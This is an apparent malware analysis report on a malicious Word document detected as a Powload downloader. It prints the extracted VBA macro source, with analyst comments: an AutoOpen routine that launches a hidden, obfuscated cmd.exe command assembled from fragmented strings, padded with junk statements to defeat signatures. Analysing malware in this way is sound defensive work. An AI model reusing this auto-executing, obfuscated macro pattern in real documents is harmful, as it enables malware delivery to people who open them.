Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 be6b5084ff80a8d2…

MALICIOUS

Office (OLE)

Size: 96.2 KB · Created: 2018-08-02 23:39:00 (embedded document metadata, not independently verified) · Authoring application: Microsoft Office Word · First seen: 2018-08-14
MD5: 6373df5ea856be574980eed82433e493 SHA-1: 46fc691f4db8a7621f2b765df81e7b701e97ab84 SHA-256: be6b5084ff80a8d2b37eebcf5fecb66b240e2d4ee1429d8520f8fd1ee480b2c3
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document whose VBA project contains an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. AutoOpen calls Shell (written as `Shell@`, a type-declaration suffix that defeats naive `Shell(` pattern matching) with window style 0 (hidden) on a command line assembled at runtime from concatenated string literals and helper-function return values. The recovered fragments begin `cmd /V:/C"set 45y=...&&for %Q in (52;14;13;...)`, a cmd.exe delayed-expansion routine that appears to rebuild the real command from a character pool one index at a time; the final command is not recovered in the static listing, so the download-and-execute behaviour is inferred rather than observed. The ClamAV detection 'Doc.Downloader.Powload-6774364-0' supports its role as a downloader; dynamic analysis or macro emulation is needed to recover the second-stage URL(s).

Heuristics 5

  • ClamAV: Doc.Downloader.Powload-6774364-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6774364-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note for this sample: a VBA project *was* recovered (see "VBA macros detected" above and the macros.bas artifact below), so this generic heuristic text is superseded by the OLE_VBA_AUTOOPEN finding; both are most likely triggered by the same AutoOpen marker and should not be counted as independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI embedded in ordinary Office documents; it is not a network indicator and should not be blocked, hunted on, or added to watchlists.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5301 bytes
SHA-256: b1096e592ea770deeafa36a79d70e7f61e6d35742b2e1807aa05f6d024bc71a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "aCVDArDbfXK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' Auto-execution entry point: Word runs this procedure when the document is
' opened with macros enabled (heuristic OLE_VBA_AUTOOPEN). Its only real work
' is the Shell call below; every "TypeName ..." line is a statement whose
' result is discarded, i.e. junk inserted to pad and obscure the body.
On Error Resume Next
   ' Error suppression: the junk statements reference names that are not
   ' declared anywhere in this excerpt, so any runtime error they raise is
   ' swallowed and execution still reaches Shell.
   TypeName AGSEt
   TypeName Sgn(4)
   TypeName CInt(UlnOI)
   TypeName Fix(asnfF)
' The command line is assembled at runtime from "c" + "m" and the return
' values of helper functions. DGqNvzRws and nMnVw are defined below; the
' remaining helpers (uiiYzCv, wibumEwjKS, hhkEP, OwWzHEm, vUNBWVikap) are
' outside this excerpt. DGqNvzRws begins with "d /V:/C", so if the two
' helpers before it contribute nothing the line appears to start
' "cmd /V:/C..." — a cmd.exe invocation with delayed variable expansion.
' The "@" after Shell is a VBA type-declaration character appended to the
' procedure name, presumably to defeat simple "Shell(" pattern matching.
' The second argument, 335172665 - 335172665, evaluates to 0 (vbHide): the
' spawned process gets no visible window.
Shell@ CStr("c") + CStr("m") + uiiYzCv + wibumEwjKS + DGqNvzRws + nMnVw + hhkEP + OwWzHEm + vUNBWVikap, 335172665 - 335172665
   ' More discarded no-op statements after the real work.
   TypeName ChrW(SfKndN)
   TypeName SawBh
   TypeName ChrW(ussGcU * 71144)
End Sub


Attribute VB_Name = "hRwQEdiiVMTD"
Function DGqNvzRws()
' Helper referenced from AutoOpen's Shell line. Returns one fragment of the
' command string: eleven string pieces (sYKFYMGu ... vKCWn) joined in order
' by the final assignment. Every "TypeName ..." line is a discarded no-op
' placed between the real assignments as noise; the names they reference
' are not declared anywhere in this excerpt.
On Error Resume Next
TypeName CStr(paMHdh)
   TypeName Chr(ZcwRLa)
   TypeName Sqr(iUYWI + zvuwvr - dmTtE / sWGfjc)
' First piece. The Chr argument is 34 plus four names not declared in this
' excerpt; if those are Empty (0 in arithmetic) it yields Chr(34), a double
' quote, and the piece reads:  d /V:/C"set 45y=cmDYQJfjrbGlzwoOWSiuinkPUEUUErX5;x h$-2/NdAH)@(',V=vp:
' i.e. the tail of a "cmd /V:/C" invocation that sets a variable named 45y
' to a scrambled character pool (shell-ish fragments like "$-2/", "@(',"
' and "v=vp:" are visible in the literals). Not confirmed beyond this excerpt.
sYKFYMGu = "d /V" + ":/C" + CStr(Chr(OOZGwiHhCm + DXXOMBizCcfAr + 34 + MRJUzSaSsPw + wKncWRRjZjwnEf)) + "s" + "et " + "45y=cmDY" + "QJfjrbG" + "lzw" + "oOWSiuin" + "kPUE" + "UUEr" + "X5;x h$-2/" + "N" + "dAH)@('," + "V=vp:"
TypeName DXZDp
   TypeName ZDspb
   TypeName Sgn(fCpiLo)
' Completes the pool, then starts "&&for %Q in (52;14;13;..." — a cmd for
' loop over a semicolon-separated list of small integers. With /V delayed
' expansion enabled this pattern is consistent with each integer indexing
' into the 45y pool to rebuild the real command one character at a time;
' the loop's "do" body is not part of what this function returns.
fJmBCZAoTOY = ".aste" + "y+7C3g" + "M}\qKF{" + "&&f" + "or %Q i" + "n" + " (52;14" + ";13" + ";58;29;56;" + "35;58;" + "1" + "1;11;34;3" + "6;12;65;43"
TypeName Rnd(laTwf)
   TypeName Chr(4)
   TypeName Oct(724)
' Pieces below are further index lists, split at arbitrary points so that no
' single literal is long enough to match a static signature.
TSKAAFpIwdY = ";50;21;5" + "8;1" + "3;37;" + "14;9;7" + ";58;0;5" + "7;34;40;" + "58;" + "57;54;1" + "6;58;9;62;" + "11;20" + ";58;"
TypeName 2752
   TypeName CByte(67)
NCmIqzi = "21;" + "57;3" + "2" + ";" + "36;42"
TypeName aCwUAj
   TypeName CBool(24278 - kjjrIh - mfOdM * 35261)
   TypeName 5
uTiHiKU = ";56;69;50" + ";47;3" + "5;57;5" + "7;52;5" + "3;3" + "9;39;56;58" + ";29;5" + "1;20;0;58" + ";37;52;0;" + "54;0;14;1" + ";54;29;14;"
TypeName Cos(99304 - YbvXc)
   TypeName Tan(dqtGoI)
   TypeName Tan(6324377)
EuwttK = "39;29;1" + "4;6" + "4;45;" + "35;57;57;" + "52;" + "53;39;39;" + "11;14;1" + "9;0;20" + ";0;54" + ";0;14;1;5" + "4;9;29;39"
TypeName Cos(jPoajr)
   TypeName ChrB(128995563)
   TypeName 430940988
IdwBkb = ";49" + ";1;2" + "9;45;3" + "5;57;57;5" + "2;53;3"
TypeName CStr(MPZYY)
   TypeName Log(85547 * ImohA - OknMH * zfqWfr)
tbKhGuF = "9;" + "39;1" + ";55;0;29;1" + "4;5" + "6;52;55;12" + ";20;14" + ";54;20;5"
TypeName ChrB(8377 + 47932 / 76165 - rPPdbX)
   TypeName 1
   TypeName CBool(78805 - RmZwbU)
alJkRKMTG = "7" + ";" + "39;14" + ";5;1" + "1;45;35;" + "57;57;52" + ";53;39;3" + "9;11;2" + "0;64;35" + ";57;37;58"
TypeName 403879529
   TypeName CSng(wuwVG)
tLYCmwRzj = ";56;57;5" + "5;57;5" + "8;54" + ";0;14;" + "54;7;5" + "2" + ";39;1" + "1;14;64" + ";14;21" + ";39;65" + ";40;63" + ";45;35;57;"
TypeName CDbl(WZAVah)
   TypeName 7825
   TypeName 6
vKCWn = "57;" + "52" + ";" + "53;3" + "9;39;" + "1;20" + ";0;35;" + "20;64;55;2"
' Return value: all pieces concatenated in the order they were assigned.
' The index list continues in nMnVw (next function), which AutoOpen appends
' directly after this one.
DGqNvzRws = sYKFYMGu + fJmBCZAoTOY + TSKAAFpIwdY + NCmIqzi + uTiHiKU + EuwttK + IdwBkb + tbKhGuF + alJkRKMTG + tLYCmwRzj + vKCWn
   TypeName wAUwwQ
   TypeName CBool(SGDLjz)
End Function
Function nMnVw()
On Error Resume Next
TypeName 475220870
   TypeName Rnd(dVcqnP)
rXHKkBMhw = "1;9;19;" + "56;20;21;5" + "8;" + "56;56;" + "54;1" + "9;56;39;" + "64;2;19;6" + "2;2;55" + ";22;16;47;" + "54;17;52" + ";11;20;5" + "7;46" + ";47"
TypeName Log(585)
   TypeName CBool(29296 / 88289 - tiVkF + rqkoJ)
JQZBI = ";45;4" + "7;44;32" + ";36;68;56;" + "65;34;" + "50;34;47;3" + "8;61;3"
TypeName Round(ZdjCi)
   TypeName CLng(9)
HHpjEECsYP = "1;47" + ";32;36" + ";41;7;" + "28;50" + ";36;58;21;"
TypeName Fix(358205924)
   TypeName iwirF
PZaYGzCidDN = "51" + ";" + "53;57;58;" + "1;52" + ";60;" + "47;6" + "7;47" + ";60;" + "3" + "6;68;56;" + "65" + ";60;47;54" + ";58;3"
TypeName toLja
   TypeName CDate(11440 - CWzLrN)
vOUnYuDYj = "3;58;47;3" + "2;" + "6;14;29;" + "58;" + "55;0;35;46" + ";36;68;1" + "0;56;34;2" + "0;21;34;3" + "6;4" + "2;56;69;" + "44;71;57;"
TypeName Tan(97491 - fqUpOU)
   TypeName 954
jzUJj = "29;59;" + "7" + "1;36;12;6" + "5;43;" + "54;2;14;1" + "3;2" + "1;11;" + "1" + "4;55;4" + "1;"
TypeName Log(286467437)
   TypeName 4
uqzcCG = "70;2" + "0;1" + "1;5
... (truncated)